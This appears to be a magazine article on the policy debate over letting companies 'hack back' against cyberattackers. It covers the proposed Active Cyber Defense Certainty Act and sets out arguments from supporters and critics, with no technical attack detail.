There is an old debate (at least, counting in internet years) that tends to crop up after major cybersecurity breaches such as the widespread WannaCry ransomware attack in May. In the aftermath of such incidents, some decry the sorry state of cybersecurity and insist that if only tech firms, with their wealth of resources and technical expertise, were allowed to go after the perpetrators of these attacks, they would do a much better job of stopping the damage and deterring other perpetrators than the slow, plodding, over-worked, under-resourced, jurisdiction-bound law-enforcement agencies.
Which raises a question: Beyond the standard set of protective tools—encryption, firewalls, anti-virus software, intrusion-detection systems, two-factor authentication—should companies be allowed to go outside the boundaries of their own networks and crash the servers that are attacking them, or delete data that has been stolen from them off their adversaries’ machines? The answer of most companies and cybersecurity experts is no. But that doesn’t stop a vocal minority—usually researchers at libertarian think tanks and lawyers concerned by how restrictive anti-hacking regulations have become—from suggesting otherwise.
The notion that companies should be given more leeway to engage in “active defense”—the cybersecurity euphemism for offense—has been quelled for years by the Computer Fraud and Abuse Act (CFAA) in the United States and its counterparts in other countries, which effectively make it illegal for people to access computer systems that don’t belong to them without permission from the owners. But some lawmakers feel the need to carve out an exception to that blanket ban for companies that infiltrate external networks in the name of self-defense. In March, Georgia Representative Tom Graves proposed the Active Cyber Defense Certainty Act (ACDC), which would change the CFAA so that it would not apply to victims of cyberattacks who accessed attackers’ networks to “gather information in order to establish attribution of criminal activity to share with law enforcement” or to “disrupt continued unauthorized activity against the victim’s own network.”
Stewart Baker, a former homeland security assistant secretary under George W. Bush and a current partner at the D.C. law firm Steptoe & Johnson, would also like to see companies be allowed to hack back. A sharp critic of the current state of law enforcement’s cybersecurity efforts, Baker has for years been trying to make it easier for private firms to be able to pursue their adversaries in cyberspace. “For a company to go to the FBI and say ‘I’ve been hacked, can you find the hacker,’ it’s like going to a university town’s police force and saying, ‘Somebody stole my bike’—you’re lucky if they don’t laugh at you,” Baker says. “The government is completely consumed just trying to take care of its own data and tracking its own attackers. It doesn’t have the resources to help firms and probably never will.”
While it may seem irrelevant to liken denial-of-service attacks and data breaches to bicycle theft, most discussions of cybersecurity laws and policies, for better or for worse, happen by analogy to the physical world. And to Baker, there are two other important ways of thinking about the importance of legislation like the ACDC. One is the widely accepted principle of an organization’s right to defend its own interests. The other is the idea that there are many tiers of people with different responsibilities in between ordinary civilians and actual law enforcement. “In the physical world,” Baker explains, “there are all kinds of people in the middle, between innocent civilians and full-on military and law-enforcement protective personnel, who have intermediary authorities—bounty hunters, private investigators, mall cops—all people who have some additional authority and who ought to be able to use that additional authority because it was deemed necessary not to rely exclusively on the police. If that’s where we end up in the physical world, why would we not welcome the idea of having intermediate authorities between ordinary civilians hunkering down behind their firewalls and the police?”
Baker’s advocacy is driven not by industry interests so much as his own deeply held belief that government officials and law enforcement agencies are incapable of addressing online threats themselves. “It’s like the NRA saying, ‘When seconds count, the police are only minutes away,’ except the police are days away when you’re talking about cybercrime,” Baker says.
Baker and Representative Graves, though, are in the minority. At least among most people willing to speak on the record, legalizing proactive responses to cybercrime is a wildly unpopular idea. Its critics range from law enforcement officials who worry it will lead to confusion in investigating cyberattacks, to lawyers who caution that such activity might well violate foreign laws even if permitted by the U.S., to security advocates who fear it will merely serve as a vehicle for more attacks and greater chaos, particularly if victims incorrectly identify who is attacking them, or even invent or stage fake attacks from adversaries as an excuse for hacking back.
And if big tech firms are clamoring for the opportunity to go after their attackers more aggressively, they are certainly not doing so publicly. “I haven’t heard from particular companies that they want to have that activity authorized,” says Greg Nojeim, the director of the Freedom, Security and Technology Project at the Center for Democracy and Technology, a think tank. At least a couple companies have actively gone after adversaries in the past—Google reportedly breached a computer in Taiwan in 2010 while investigating attacks on its customers, and in 2014 the FBI examined whether some banks had hired hackers to crash servers being used by Iran—but known examples are few and, on the whole, relatively tame.
“I think a lot of companies would be hesitant to take the position,” Nojeim continued, “that it’s okay to engage in active-defense measures on somebody else’s network out of fear that their own networks would then become targets.” He, like many critics of broad hacking-back legalization, makes certain distinctions for defensive activities he views as less problematic. For instance, he is comfortable with “beaconing,” the practice of attaching code to sensitive files that will report back to their owners the IP address of machines they are copied onto when stolen.
Others argue that the crucial limits relate to who is permitted to hack back rather than what they are permitted to do. For instance, Jeremy Rabkin, a law professor at George Mason University, has advocated for putting together a list of cybersecurity firms vetted by the U.S. government, so that companies could hire an approved hack-back vendor to go after its online adversaries. “A lot of things can go wrong when people start mucking around in your files and your systems,” Rabkin told me. “You have to trust these people; you have to be sure that they’re not going to steal stuff or tip off other people.” In his estimation, there are only a handful of firms—highly regarded security companies and contractors that have longstanding relationships with the U.S. government and ex-military personnel, mostly—that can be trusted to pull this off.
Michael Chertoff, the former secretary of homeland security under George W. Bush who now runs his own consulting firm, argues that any private firm’s activities should be not only government-approved but also closely coordinated with U.S. officials. “If it’s not done at the direction of the government, then you get into something which is not terribly different from what the Russians do,” he says, referring to the Russian government’s reliance on intelligence gathered by criminals, allowing it to benefit from crimes without accepting responsibility for them. Ultimately, Chertoff doesn’t think that countering cyberattacks is something the government needs help with or for which it is interested in outsourcing its responsibilities.
Patrick Lin, a professor of philosophy at California Polytechnic State University, has finer-grained logistical concerns about any legislation that opens up the possibility of hacking back, regardless of what one makes of whether it is justified or not. “It is much too premature to allow for hacking back, even if the practice isn’t immoral,” Lin says. “At minimum, there needs to be a clear process to authorize or post-hoc review cyber counterattacks to ensure they’re justified, including penalties for irresponsible attacks. That oversight infrastructure hasn’t even been sketched out.” (There’s little discussion of such oversight in the current discussion draft of the ACDC, though under the most recent draft, released in May, companies would be required to report their activities to the FBI.)
At a moment when most people are concerned with trying to reduce online attacks, proposals to legalize hacking back and encourage more cyber conflict are a bit of an oddity. They rely on the implicit assumption that offense is the best defense, even though offense and defense have, in general, looked entirely different from each other online: The tools for defending computers like encryption and network monitoring bear almost no resemblance to the tools used to attack computers, such as botnets and phishing. Legalizing hacking back would conflate those two domains and, in doing so, likely make it that much harder to distinguish between the good guys and the bad guys online.